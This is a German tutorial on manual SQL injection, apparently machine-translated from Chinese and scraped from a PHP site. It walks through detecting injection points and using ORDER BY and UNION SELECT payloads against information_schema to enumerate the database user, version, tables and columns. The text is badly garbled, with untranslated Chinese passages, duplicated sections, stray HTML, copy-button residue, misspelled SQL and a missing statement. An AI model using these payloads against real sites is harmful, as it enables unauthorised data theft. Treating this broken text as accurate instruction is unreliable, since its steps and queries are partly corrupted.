Dieser Artikel behandelt einige Probleme im Zusammenhang mit der manuellen Injektion in SQL, einschließlich Problemen im Zusammenhang mit der Bestimmung des Injektionspunkts und der Bestimmung des Injektionstyps. Ich hoffe, dass er für alle hilfreich ist.
Bestimmen Sie den Injektionspunkt
1. Fügen Sie ein einfaches Anführungszeichen direkt nach der URL hinzu. Wenn die Seite nicht normal angezeigt werden kann und der Browser einige Ausnahmeinformationen zurückgibt, bedeutet dies, dass der Link möglicherweise eine SQL enthält Injektionsschwachstelle
2.1 = 1 und 1 = 2: Fügen Sie nach der URL und 1 = 1 zum get-Parameter hinzu, die Anzeige ist normal. Ersetzen Sie 1 = 1 durch 1 = 2. Die Anzeige ist abnormal, was darauf hinweist, dass eine SQL-Injection vorliegt auf der Webseite.
Bestimmen Sie den Injektionstyp
1. Numerische Injektion: Der Wert der injizierten Variablen muss nicht in Anführungszeichen gesetzt werden, wie zum Beispiel
select * from user where id=$id;
Nach dem Login kopieren
2. Zeicheninjektion: Die injizierte Variable wird in Anführungszeichen gesetzt, wie zum Beispiel „
select * from user where username='$username';`
Nach dem Login kopieren
Achten Sie beim Injizieren darauf. Schließen Sie die Anführungszeichen.
3. Suchtyp-Injektion:
select * from user where username like '%$pass%';
Nach dem Login kopieren
Konstruieren Sie die SQL-Anweisung als
select * from user where username like '%$pass%' union select语句 '%%';
Nach dem Login kopieren
Das heißt, die übertragene Variable ist pass%‘ Union Select Statement ‚%, um einen Abschluss zu bilden.
Bestimmen Sie die Übermittlungsmethode für den Injektionspunkt.
Bestimmen Sie, ob die Übermittlungsmethode für den Injektionspunkt Get, Post oder Cookie ist, indem Sie Pakete erfassen.
Verwenden Sie „Order by“, um Felder abzufragen Fehler und bei der Eingabe von order by 8, die Seite Die Anzeige ist normal, das heißt, es gibt 8 Felder in der Datenbank.
Die Abfrageanweisung lautet beispielsweise:
select * from user where id='$id'; Die folgende Eingabe kann erstellt werden: (id = ') ' order by 3 '+ --+<br> Das heißt, die Abfrageanweisung lautet: <code>select * from user where id='' order by 3 '--'select * from user where id='$id';
可以构造下面的输入:(id = ') ' order by 3 '+--+
即查询语句为:select * from user where id='' order by 3 '--'
使用联合查询来查询当前数据库、用户、版本信息
使用 union select 语句来查询当前使用用户 user() , 数据库database() ,数据库版本 version() ,服务器操作系统的@@version_compile_os等信息
version版本十分重要,如果版本在5.0以上,就可以使用information_schema库来轻易的查询想要的信息
构造语句:
select * from user where id='' union select user(),database(),version()+--+;
Nach dem Login kopieren
查询当前数据库中的表,列和值
5.0 版本以上的mysql数据库自带的information_schema库中存储着数据库中所有的表名和列明信息。
下面我们就应该根据第五步查询的当前数据库的结果(如数据库为database_1)名下所有的表名tables的信息。
Information_schema.tables :记录着数据库中所有表名信息的表。
构造的查询语句如下:
Select * from user where id='' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database_1;--
Nach dem Login kopieren
查询的结果为:第五步查询的当前数据库中的表名信息。
Information_schema.columns:
Verwenden Sie die Union-Abfrage, um die aktuelle Datenbank abzufragen. Benutzer- und Versionsinformationen
Verwenden Sie die SELECT-Anweisung, um den aktuellen Benutzer user(), die Datenbankdatenbank(), die Datenbankversion version(), @@version_compile_os und andere Informationen des Serverbetriebssystems abzufragen Sehr wichtig. Wenn die Version höher als 5.0 ist, können Sie die information_schema-Bibliothek verwenden, um die gewünschten Informationen einfach abzufragen
Erstellen Sie die Anweisung:
Select * from user where id='' union selcet 1,group_concat(column_name),3 from information_schema.columns where table_name=table_1;--
Nach dem Login kopieren
Fragen Sie die Tabellen, Spalten und Werte in der aktuellen Datenbank ab
Die information_schema-Bibliothek Das mit der MySQL-Datenbankversion 5.0 oder höher gelieferte Programm speichert alle Tabellennamen und aufgelisteten Informationen in der Datenbank. Als nächstes sollten wir die Informationen aller Tabellen mit dem Namen „tables“ anhand des Ergebnisses der aktuellen Datenbankabfrage in Schritt 5 überprüfen (z. B. ist die Datenbank „Datenbank_1“).
Information_schema.tables: Eine Tabelle, die alle Tabellennameninformationen in der Datenbank aufzeichnet. 🎜 Die konstruierte Abfrageanweisung lautet wie folgt: 🎜
Selcet * from user where id='' union select 1,column_1,column_2 from tables;--
Nach dem Login kopieren
🎜Das Ergebnis der Abfrage ist: die Tabellennameninformationen in der aktuellen Datenbank, die im fünften Schritt abgefragt wurden. 🎜
Information_schema.columns: zeichnet die Spaltennameninformationen aller Tabellen in der Datenbank auf. 🎜 Als nächstes sollten Sie die Spaltennameninformationen basierend auf den Tabellennameninformationen abfragen, die Sie aus der obigen Abfrage erhalten haben (z. B.). Tabelle ist Tabelle_1). Konstruieren Sie die Anweisung 🎜rrreee🎜, um die angegebenen Datenbankbezeichnungen abzufragen. Tabellenspeicherdaten🎜🎜Empfohlenes Lernen: 🎜MySQL-Video-Tutorial🎜🎜
Das obige ist der detaillierte Inhalt vonLassen Sie uns über den einfachen manuellen SQL-Injection-Prozess sprechen. Für weitere Informationen folgen Sie bitte anderen verwandten Artikeln auf der PHP chinesischen Website!
